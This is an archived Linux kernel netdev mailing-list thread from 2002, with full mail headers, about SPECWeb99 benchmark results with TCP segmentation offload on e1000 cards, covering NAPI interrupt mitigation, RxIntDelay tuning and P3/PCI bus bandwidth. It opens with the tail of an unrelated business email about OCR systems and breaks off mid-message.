At present we are still planning to continue our research until we decide which OCR system best suits our needs, then implement it quickly. If you are just starting to consider this technology feel free to stay in touch. We will let you know what we decide on and if it works for us. If you cannot advise on this please forward this E-mail to the proper individual in your company who might be able to help with this. Thanks, Steve From Robert.Olsson@data.slu.se Tue Sep 10 04:50:46 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 10 Sep 2002 04:50:49 -0700 (PDT) Received: from robur.slu.se (robur.slu.se [130.238.98.12]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8ABojtG032690 for ; Tue, 10 Sep 2002 04:50:46 -0700 Received: (from robert@localhost) by robur.slu.se (8.9.3/8.9.3) id OAA12576; Tue, 10 Sep 2002 14:02:20 +0200 From: Robert Olsson MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15741.57164.402952.136812@robur.slu.se> Date: Tue, 10 Sep 2002 14:02:20 +0200 To: "David S. Miller" Cc: manfred@colorfullife.com, haveblue@us.ibm.com, hadi@cyberus.ca, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <20020906.123428.28085660.davem@redhat.com> References: <3D78F55C.4020207@colorfullife.com> <20020906.113829.65591342.davem@redhat.com> <3D790499.8020501@colorfullife.com> <20020906.123428.28085660.davem@redhat.com> X-Mailer: VM 6.92 under Emacs 19.34.1 X-archive-position: 148 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Robert.Olsson@data.slu.se Precedence: bulk X-list: netdev Manfred Spraul: >> But what if the backlog queue is empty all the time? Then NAPI thinks >> that the system is idle, and reenables the interrupts after each packet :-( Yes and this happens even with without NAPI. Just set RxIntDelay=X and send pkts at >= X+1 interval. 
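As a rough illustration of that last point, here is a minimal Python sketch. It assumes a simplified model in which the receive delay timer restarts on every arriving packet and an interrupt fires when the timer expires; real hardware may behave differently. The name `count_rx_interrupts` and its parameters are hypothetical and not taken from any driver.

```python
def count_rx_interrupts(arrival_times_us, rx_int_delay_us):
    """Count RX interrupts under a simplified delay-timer model.

    Assumption: each packet (re)starts a timer of rx_int_delay_us, and one
    interrupt fires when the timer expires with no newer packet in between.
    """
    interrupts = 0
    deadline = None
    for t in sorted(arrival_times_us):
        if deadline is not None and t > deadline:
            interrupts += 1  # timer expired before this packet arrived
        deadline = t + rx_int_delay_us
    if deadline is not None:
        interrupts += 1  # the timer started by the last packet also expires
    return interrupts


# Packets spaced X+1 us apart with RxIntDelay=X: one interrupt per packet.
spaced = [i * 65 for i in range(100)]
# Packets spaced well inside the delay window: a single batched interrupt.
bursty = [i * 10 for i in range(100)]
print(count_rx_interrupts(spaced, 64), count_rx_interrupts(bursty, 64))
```

Under this model the delay only helps when packets arrive closer together than the delay itself, which is the case Manfred's question is about.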
>> Dave, do you have interrupt rates from the clients with and without NAPI?

DaveM:
> Robert does.

Yes we get into this interesting discussion now... With NAPI we can safely use RxIntDelay=0 (e1000 terminology). With the classical IRQ we simply had to add latency (RxIntDelay of 64-128 us is common for GIGE) just to survive at higher speeds (GIGE max is 1.48 Mpps), and with the interrupt latency also come higher network latencies... IMO this delay was a "work-around" for the old interrupt scheme. So we now have the option of removing it... But we are trading less latency for more interrupts. So yes Manfred is correct...

So is there a decent setting/compromise?

Well, a first approximation is to do just what DaveM suggested: RxIntDelay=0. This solved many problems with buggy hardware and complicated tuning. RxIntDelay used to be combined with other mitigation parameters to compensate for different packet sizes etc. This led to very "fragile" performance, where a NIC could perform excellently with a single TCP stream but be seriously broken in many other tests. So tuning to just one "test" can cause a lot of mis-tuning as well.

Anyway. A tulip NAPI variant added mitigation when we reached "some load" to avoid the static interrupt delay. (Still keeping things pretty simple):

Load  "Mode"
-------------------
Lo    1) RxIntDelay=0
Mid   2) RxIntDelay=fix (When we had X pkts on the RX ring)
Hi    3) Consecutive polling. No RX interrupts.

Is it worth the effort? For SMP w/o affinity the delay could eventually reduce the cache bouncing since the packets become more "batched", at the cost of latency of course.

We use RxIntDelay=0 for production use. (IP-forwarding on UP)

Cheers.
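The three-mode scheme described above could be sketched roughly as follows. This is only an illustration of the idea of keying the mode off the number of packets found on the RX ring; the message gives no concrete thresholds, so `mid_threshold`, `poll_budget`, `RxMode` and `pick_rx_mode` are all hypothetical and not taken from the tulip driver.

```python
from enum import Enum


class RxMode(Enum):
    LO = "RxIntDelay=0"
    MID = "RxIntDelay=fixed"
    HI = "consecutive polling, RX interrupts off"


def pick_rx_mode(pkts_on_ring, mid_threshold=8, poll_budget=64):
    """Pick a mitigation mode from the RX ring occupancy.

    Both thresholds are made-up illustration values (the "X pkts" in the
    message is not specified).
    """
    if pkts_on_ring >= poll_budget:
        return RxMode.HI   # ring keeps filling: stay in polling mode
    if pkts_on_ring >= mid_threshold:
        return RxMode.MID  # some load: switch on a fixed interrupt delay
    return RxMode.LO       # light load: interrupt immediately


for occupancy in (0, 8, 64):
    print(occupancy, pick_rx_mode(occupancy).name)
```

Ring occupancy is used here because it is cheap to read at interrupt time; a rate-based trigger would need a timer or moving average on top.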
--ro
From manfred@colorfullife.com Tue Sep 10 09:52:23 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 10 Sep 2002 09:52:30 -0700 (PDT) Received: from dbl.q-ag.de (IDENT:root@dbl.q-ag.de [80.146.160.66]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8AGqLtG019003 for ; Tue, 10 Sep 2002 09:52:22 -0700 Received: from colorfullife.com (IDENT:root@localhost.localdomain [127.0.0.1]) by dbl.q-ag.de (8.11.6/8.11.6) with ESMTP id g8AGtVl19953; Tue, 10 Sep 2002 18:55:31 +0200 Message-ID: <3D7E2407.6060209@colorfullife.com> Date: Tue, 10 Sep 2002 18:55:35 +0200 From: Manfred Spraul User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) X-Accept-Language: en, de MIME-Version: 1.0 To: Robert Olsson CC: "David S. Miller" , haveblue@us.ibm.com, hadi@cyberus.ca, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <3D78F55C.4020207@colorfullife.com> <20020906.113829.65591342.davem@redhat.com> <3D790499.8020501@colorfullife.com> <20020906.123428.28085660.davem@redhat.com> <15741.57164.402952.136812@robur.slu.se> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 150 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: manfred@colorfullife.com Precedence: bulk X-list: netdev Robert Olsson wrote: > > Anyway. A tulip NAPI variant added mitigation when we reached "some > load" to avoid the static interrupt delay. (Still keeping things > pretty simple): > > Load "Mode" > ------------------- > Lo 1) RxIntDelay=0 > Mid 2) RxIntDelay=fix (When we had X pkts on the RX ring) > Hi 3) Consecutive polling. No RX interrupts. > Sounds good.
The difficult part is when to go from Lo to Mid. Unfortunately my tulip card is braindead (LC82C168), but I'll try to find something usable for benchmarking In my tests with the winbond card, I've switched at a fixed packet rate: < 2000 packets/sec: no delay > 2000 packets/sec: poll rx at 0.5 ms -- Manfred From Robert.Olsson@data.slu.se Wed Sep 11 00:35:06 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 11 Sep 2002 00:35:09 -0700 (PDT) Received: from robur.slu.se (robur.slu.se [130.238.98.12]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8B7Z4tG001576 for ; Wed, 11 Sep 2002 00:35:05 -0700 Received: (from robert@localhost) by robur.slu.se (8.9.3/8.9.3) id JAA30508; Wed, 11 Sep 2002 09:46:45 +0200 From: Robert Olsson MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15742.62693.570789.558310@robur.slu.se> Date: Wed, 11 Sep 2002 09:46:45 +0200 To: Manfred Spraul Cc: Robert Olsson , "David S. Miller" , haveblue@us.ibm.com, hadi@cyberus.ca, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <3D7E2407.6060209@colorfullife.com> References: <3D78F55C.4020207@colorfullife.com> <20020906.113829.65591342.davem@redhat.com> <3D790499.8020501@colorfullife.com> <20020906.123428.28085660.davem@redhat.com> <15741.57164.402952.136812@robur.slu.se> <3D7E2407.6060209@colorfullife.com> X-Mailer: VM 6.92 under Emacs 19.34.1 X-archive-position: 151 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Robert.Olsson@data.slu.se Precedence: bulk X-list: netdev > > Load "Mode" > > ------------------- > > Lo 1) RxIntDelay=0 > > Mid 2) RxIntDelay=fix (When we had X pkts on the RX ring) > > Hi 3) Consecutive polling. No RX interrupts. Manfred Spraul writes: > Sounds good. > > The difficult part is when to go from Lo to Mid. 
Unfortunately my tulip > card is braindead (LC82C168), but I'll try to find something usable for > benchmarking 21143 for tulip's. Well any NIC with "RxIntDelay" should do. > In my tests with the winbond card, I've switched at a fixed packet rate: > > < 2000 packets/sec: no delay > > 2000 packets/sec: poll rx at 0.5 ms I was experimenting with all sorts of moving averages but never got a good correlation with bursty network traffic as this level of resolution. The only measure I found fast and simple enough for this was the number of packets on the RX ring as I mentioned. Cheers. --ro From ebiederm@xmission.com Wed Sep 11 02:21:40 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 11 Sep 2002 02:21:45 -0700 (PDT) Received: from frodo.biederman.org (ebiederm.dsl.xmission.com [166.70.28.69]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8B9LdtG009924 for ; Wed, 11 Sep 2002 02:21:39 -0700 Received: (from eric@localhost) by frodo.biederman.org (8.9.3/8.9.3) id DAA14951; Wed, 11 Sep 2002 03:11:49 -0600 To: "Martin J. Bligh" Cc: "David S. Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <20020905.204721.49430679.davem@redhat.com> <18563262.1031269721@[10.10.2.3]> From: ebiederm@xmission.com (Eric W. Biederman) Date: 11 Sep 2002 03:11:49 -0600 In-Reply-To: <18563262.1031269721@[10.10.2.3]> Message-ID: Lines: 23 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 152 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ebiederm@xmission.com Precedence: bulk X-list: netdev "Martin J. Bligh" writes: > > Ie. the headers that don't need to go across the bus are the critical > > resource saved by TSO. 
> > I'm not sure that's entirely true in this case - the Netfinity > 8500R is slightly unusual in that it has 3 or 4 PCI buses, and > there's 4 - 8 gigabit ethernet cards in this beast spread around > different buses (Troy - are we still just using 4? ... and what's > the raw bandwidth of data we're pushing? ... it's not huge). > > I think we're CPU limited (there's no idle time on this machine), > which is odd for an 8 CPU 900MHz P3 Xeon, Quite possibly. The P3 has roughly an 800MB/s FSB bandwidth, that must be used for both I/O and memory accesses. So just driving a gige card at wire speed takes a considerable portion of the cpus capacity. On analyzing this kind of thing I usually find it quite helpful to compute what the hardware can theoretically to get a feel where the bottlenecks should be. Eric From mbligh@aracnet.com Wed Sep 11 07:08:24 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 11 Sep 2002 07:08:30 -0700 (PDT) Received: from franka.aracnet.com (franka.aracnet.com [216.99.193.44]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8BE8OtG018697 for ; Wed, 11 Sep 2002 07:08:24 -0700 Received: from titus.gormenghast (216-99-201-239.dial.spiritone.com [216.99.201.239]) by franka.aracnet.com (8.12.5/8.12.5) with ESMTP id g8BEAtv5022508; Wed, 11 Sep 2002 07:10:55 -0700 Received: from [10.10.2.3] (fuchsia.gormenghast [10.10.2.3]) by titus.gormenghast (8.12.3/8.12.3/Debian -4) with ESMTP id g8BECo5c021435; Wed, 11 Sep 2002 07:12:50 -0700 Date: Wed, 11 Sep 2002 07:10:57 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: "Eric W. Biederman" cc: "David S. 
Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <477096648.1031728254@[10.10.2.3]> In-Reply-To: References: X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 153 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mbligh@aracnet.com Precedence: bulk X-list: netdev >> > Ie. the headers that don't need to go across the bus are the critical >> > resource saved by TSO. >> >> I'm not sure that's entirely true in this case - the Netfinity >> 8500R is slightly unusual in that it has 3 or 4 PCI buses, and >> there's 4 - 8 gigabit ethernet cards in this beast spread around >> different buses (Troy - are we still just using 4? ... and what's >> the raw bandwidth of data we're pushing? ... it's not huge). >> >> I think we're CPU limited (there's no idle time on this machine), >> which is odd for an 8 CPU 900MHz P3 Xeon, > > Quite possibly. The P3 has roughly an 800MB/s FSB bandwidth, that must > be used for both I/O and memory accesses. So just driving a gige card at > wire speed takes a considerable portion of the cpus capacity. > > On analyzing this kind of thing I usually find it quite helpful to > compute what the hardware can theoretically to get a feel where the > bottlenecks should be. We can push about 420MB/s of IO out of this thing (out of that theoretical 800Mb/s). Specweb is only pushing about 120MB/s of total data through it, so it's not bus limited in this case. Of course, I should have given you that data to start with, but ... ;-) M. PS. This thing actually has 3 system buses, 1 for each of the two sets of 4 CPUs, and 1 for all the PCI buses, and the three buses are joined by an interconnect in the middle. 
But all the IO goes through 1 of those buses, so for the purposes of this discussion, it makes no difference whatsoever ;-) From ebiederm@xmission.com Wed Sep 11 08:16:32 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 11 Sep 2002 08:16:39 -0700 (PDT) Received: from frodo.biederman.org (ebiederm.dsl.xmission.com [166.70.28.69]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8BFGVtG021175 for ; Wed, 11 Sep 2002 08:16:31 -0700 Received: (from eric@localhost) by frodo.biederman.org (8.9.3/8.9.3) id JAA15577; Wed, 11 Sep 2002 09:06:37 -0600 To: "Martin J. Bligh" Cc: "David S. Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <477096648.1031728254@[10.10.2.3]> From: ebiederm@xmission.com (Eric W. Biederman) Date: 11 Sep 2002 09:06:36 -0600 In-Reply-To: <477096648.1031728254@[10.10.2.3]> Message-ID: Lines: 55 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 154 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ebiederm@xmission.com Precedence: bulk X-list: netdev "Martin J. Bligh" writes: > >> > Ie. the headers that don't need to go across the bus are the critical > >> > resource saved by TSO. > >> > >> I'm not sure that's entirely true in this case - the Netfinity > >> 8500R is slightly unusual in that it has 3 or 4 PCI buses, and > >> there's 4 - 8 gigabit ethernet cards in this beast spread around > >> different buses (Troy - are we still just using 4? ... and what's > >> the raw bandwidth of data we're pushing? ... it's not huge). > >> > >> I think we're CPU limited (there's no idle time on this machine), > >> which is odd for an 8 CPU 900MHz P3 Xeon, > > > > Quite possibly. 
The P3 has roughly an 800MB/s FSB bandwidth, that must
> > be used for both I/O and memory accesses. So just driving a gige card at
> > wire speed takes a considerable portion of the cpus capacity.
> >
> > On analyzing this kind of thing I usually find it quite helpful to
> > compute what the hardware can theoretically to get a feel where the
> > bottlenecks should be.
>
> We can push about 420MB/s of IO out of this thing (out of that
> theoretical 800Mb/s).

Sounds about average for a P3. I have pushed the full 800MiB/s out of a P3 processor to memory but it was a very optimized loop. Is that 420MB/sec of IO on this test?

> Specweb is only pushing about 120MB/s of
> total data through it, so it's not bus limited in this case.

Not quite. But you suck at least 240MB/s of your memory bandwidth with DMA from disk, and then DMA to the nic. Unless there is a highly cached component. So I doubt you can effectively use more than 1 gige card, maybe 2. And you have 8?

> Of course, I should have given you that data to start with,
> but ... ;-)
>
> PS. This thing actually has 3 system buses, 1 for each of the two
> sets of 4 CPUs, and 1 for all the PCI buses, and the three buses
> are joined by an interconnect in the middle. But all the IO goes
> through 1 of those buses, so for the purposes of this discussion,
> it makes no difference whatsoever ;-)

Wow, the hardware designers really believed in over-subscription. If the busses are just running 64bit/33MHz you are oversubscribed. And at 64bit/66MHz the pci busses can easily swamp the system: 533*4 ~= 2132MB/s.

What kind of memory bandwidth does the system have, and on which bus are the memory controllers?
I'm just curious Eric From davem@redhat.com Wed Sep 11 08:18:53 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 11 Sep 2002 08:18:55 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8BFIrtG021573 for ; Wed, 11 Sep 2002 08:18:53 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id IAA28585; Wed, 11 Sep 2002 08:15:22 -0700 Date: Wed, 11 Sep 2002 08:15:21 -0700 (PDT) Message-Id: <20020911.081521.103561835.davem@redhat.com> To: ebiederm@xmission.com Cc: mbligh@aracnet.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: References: <477096648.1031728254@[10.10.2.3]> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 155 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: ebiederm@xmission.com (Eric W. Biederman) Date: 11 Sep 2002 09:06:36 -0600 "Martin J. Bligh" writes: > We can push about 420MB/s of IO out of this thing (out of that > theoretical 800Mb/s). Sounds about average for a P3. I have pushed the full 800MiB/s out of a P3 processor to memory but it was a very optimized loop. You pushed that over the PCI bus of your P3? Just to RAM doesn't count, lots of cpu's can do that. That's what makes his number interesting. 
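The bus figures traded in this exchange can be checked with a few lines of arithmetic. The sketch below uses the textbook peak for a parallel PCI bus (bus width times clock, one transfer per clock) and takes the 800MB/s front-side-bus figure and the count of four buses from the messages above; `pci_peak_mb_per_s` is a hypothetical helper name, and real sustained throughput is lower than these peaks.

```python
def pci_peak_mb_per_s(width_bits, clock_mhz):
    """Theoretical peak of a parallel PCI bus, assuming one transfer per clock."""
    return width_bits / 8 * clock_mhz


FSB_MB_PER_S = 800  # P3 front-side-bus figure quoted in the thread
BUSES = 4           # upper end of the "3 or 4 PCI buses" mentioned

slow = BUSES * pci_peak_mb_per_s(64, 33)  # four 64bit/33MHz buses
fast = BUSES * pci_peak_mb_per_s(64, 66)  # four 64bit/66MHz buses

print(slow, fast, slow > FSB_MB_PER_S)  # prints: 1056.0 2112.0 True
```

Using the nominal 66.67 MHz clock instead of 66 gives about 533MB/s per bus, which is the per-bus figure used in the estimate above. Either way the aggregate PCI peak exceeds the 800MB/s bus it feeds.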
From mbligh@aracnet.com Wed Sep 11 08:24:47 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 11 Sep 2002 08:24:51 -0700 (PDT) Received: from franka.aracnet.com (franka.aracnet.com [216.99.193.44]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8BFOltG022024 for ; Wed, 11 Sep 2002 08:24:47 -0700 Received: from titus.gormenghast (216-99-201-239.dial.spiritone.com [216.99.201.239]) by franka.aracnet.com (8.12.5/8.12.5) with ESMTP id g8BFRKv5026162; Wed, 11 Sep 2002 08:27:21 -0700 Received: from [10.10.2.3] (fuchsia.gormenghast [10.10.2.3]) by titus.gormenghast (8.12.3/8.12.3/Debian -4) with ESMTP id g8BFTF5c021913; Wed, 11 Sep 2002 08:29:15 -0700 Date: Wed, 11 Sep 2002 08:27:21 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: "Eric W. Biederman" cc: "David S. Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <481681441.1031732839@[10.10.2.3]> In-Reply-To: References: X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 156 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mbligh@aracnet.com Precedence: bulk X-list: netdev > Sounds about average for a P3. I have pushed the full 800MiB/s out of > a P3 processor to memory but it was a very optimized loop. Is > that 420MB/sec of IO on this test? Yup, Fibre channel disks. So we know we can push at least that. > Note quite. But you suck at least 240MB/s of your memory bandwidth with > DMA from disk, and then DMA to the nic. Unless there is a highly > cached component. So I doubt you can effectively use more than 1 gige > card, maybe 2. And you have 8? Nope, it's operating totally out of pagecache, there's no real disk IO to speak of. 
> Wow the hardware designers really believed in over-subscription. > If the busses are just running 64bit/33Mhz you are oversubscribed. > And at 64bit/66Mhz the pci busses can easily swamp the system > 533*4 ~= 2128MB/s. Two 32bit buses (or maybe it was just one) and two 64bit buses, all at 66MHz. Yes, the PCI buses can push more than the backplane, but things are never perfectly balanced in reality, so I'd prefer it that way around ... it's not a perfect system, but hey, it's Intel hardware - this is high volume market, not real high end ;-) > What kind of memory bandwidth does the system have, and on which > bus are the memory controllers? I'm just curious Memory controllers are hung off the interconnect, slightly difficult to describe. Look for docs on the Intel profusion chipset, or I can send you a powerpoint (yeah, yeah) presentation when I get into work later today if you can't find it. Theoretical mem bandwidth should be 1600MB/s if you're balanced across the CPUs, in practice I'd expect to be able to push somewhat over 800Mb/s. M. From ebiederm@xmission.com Wed Sep 11 08:41:47 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 11 Sep 2002 08:41:52 -0700 (PDT) Received: from frodo.biederman.org (ebiederm.dsl.xmission.com [166.70.28.69]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8BFfltG022653 for ; Wed, 11 Sep 2002 08:41:47 -0700 Received: (from eric@localhost) by frodo.biederman.org (8.9.3/8.9.3) id JAA15667; Wed, 11 Sep 2002 09:31:53 -0600 To: "David S. Miller" Cc: mbligh@aracnet.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <477096648.1031728254@[10.10.2.3]> <20020911.081521.103561835.davem@redhat.com> From: ebiederm@xmission.com (Eric W. 
Biederman) Date: 11 Sep 2002 09:31:53 -0600 In-Reply-To: <20020911.081521.103561835.davem@redhat.com> Message-ID: Lines: 46 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 157 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ebiederm@xmission.com Precedence: bulk X-list: netdev

"David S. Miller" writes:

> From: ebiederm@xmission.com (Eric W. Biederman)
> Date: 11 Sep 2002 09:06:36 -0600
>
> "Martin J. Bligh" writes:
>
> > We can push about 420MB/s of IO out of this thing (out of that
> > theoretical 800Mb/s).
>
> Sounds about average for a P3. I have pushed the full 800MiB/s out of
> a P3 processor to memory but it was a very optimized loop.
>
> You pushed that over the PCI bus of your P3? Just to RAM
> doesn't count, lots of cpu's can do that.
>
> That's what makes his number interesting.

I agree. Getting 420MB/s to the pci bus is nice, especially with a P3. The 800MB/s to memory was just the test I happened to conduct about 2 years ago when I was still messing with slow P3 systems. It was a proof of concept test to see if we could plug an I/O card into a memory slot.

On a current P4 system with the E7500 chipset this kind of thing is easy. I have gotten roughly 450MB/s to a single myrinet card. And there is enough theoretical bandwidth to do 4 times that. I haven't had a chance to get it working in practice. When I attempted to run two gige cards simultaneously I had some weird problem (probably interrupt related) where adding additional pci cards did not deliver any extra performance.

On a P3, to get writes from the cpu to hit 800MB/s you use the special cpu instructions that bypass the cache.

My point was that I have tested the P3 bus in question and I achieved a real world 800MB/s over it.
So I expect that on the system in question unless another bottleneck is hit, it should be possible to achieve a real world 800MB/s of I/O. There are enough pci busses to support that kind of traffic. Unless the memory controller is carefully placed on the system though doing 400+MB/s could easily eat up most of the available memory bandwidth and reduce the system to doing some very slow cache line fills. Eric From todd@osogrande.com Thu Sep 12 00:26:37 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 00:26:43 -0700 (PDT) Received: from puerco.nm.org (puerco.nm.org [129.121.1.22]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8C7QbtG024494 for ; Thu, 12 Sep 2002 00:26:37 -0700 Received: (qmail 78226 invoked from network); 12 Sep 2002 07:27:30 -0000 Received: from unknown (HELO gallinas) (129.121.5.22) by puerco.nm.org with SMTP; 12 Sep 2002 07:27:30 -0000 Date: Thu, 12 Sep 2002 01:28:34 -0600 (MDT) From: Todd Underwood X-X-Sender: todd@gp To: "David S. Miller" cc: "hadi@cyberus.ca" , "tcw@tempest.prismnet.com" , "linux-kernel@vger.kernel.org" , "netdev@oss.sgi.com" Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <20020905.204721.49430679.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 158 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: todd@osogrande.com Precedence: bulk X-list: netdev folx, sorry for the late reply. catching up on kernel mail. so all this TSO stuff looks v. v. similar to the IP-only fragmentation that patricia gilfeather and i implemented on alteon acenics a couple of years ago (see http://www.cs.unm.edu/~maccabe/SSL/frag/FragPaper1/ for a general overview). it's exciting to see someone else take a stab on different hardware and approaching some of the tcp-specific issues. 
the main difference, though, is that general purpose kernel development is still focused on the improvements in *sending* speed. for real high performance networking, the improvements are necessary in *receiving* cpu utilization, in our estimation. (see our analysis of interrupt overhead and the effect on receivers at gigabit speeds--i hope that this has become common understanding by now)

i guess i can't disagree with david miller that the improvements in TSO are due entirely to header retransmission for sending, but that's only because sending wasn't CPU-intensive in the first place. we were able to get a significant reduction in receiver cpu-utilization by reassembling IP fragments on the receiver side (sort of a standards-based interrupt mitigation strategy that has the benefit of not increasing latency the way interrupt coalescing does).

anyway, nice work,

t.

On Thu, 5 Sep 2002, David S. Miller wrote:

> It's the DMA bandwidth saved, most of the specweb runs on x86 hardware
> is limited by the DMA throughput of the PCI host controller. In
> particular some controllers are limited to smaller DMA bursts to
> work around hardware bugs.
>
> Ie. the headers that don't need to go across the bus are the critical
> resource saved by TSO.
>
> I think I've said this a million times, perhaps the next person who
> tries to figure out where the gains come from can just reply with
> a pointer to a URL of this email I'm typing right now :-)

--
todd underwood, vp & cto
oso grande technologies, inc.
todd@osogrande.com

"Those who give up essential liberties for temporary safety deserve neither liberty nor safety."
- Benjamin Franklin From hadi@cyberus.ca Thu Sep 12 05:33:06 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 05:33:12 -0700 (PDT) Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8CCX5tG031746 for ; Thu, 12 Sep 2002 05:33:06 -0700 Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) with ESMTP id IAA10675; Thu, 12 Sep 2002 08:37:41 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g8CCUiv16314; Thu, 12 Sep 2002 08:30:44 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Thu, 12 Sep 2002 08:30:44 -0400 (EDT) From: jamal To: Todd Underwood cc: "David S. Miller" , "tcw@tempest.prismnet.com" , "linux-kernel@vger.kernel.org" , "netdev@oss.sgi.com" Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 159 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev Good work. The first time i have seen someone say Linux's way of reverse order is a GoodThing(tm). It 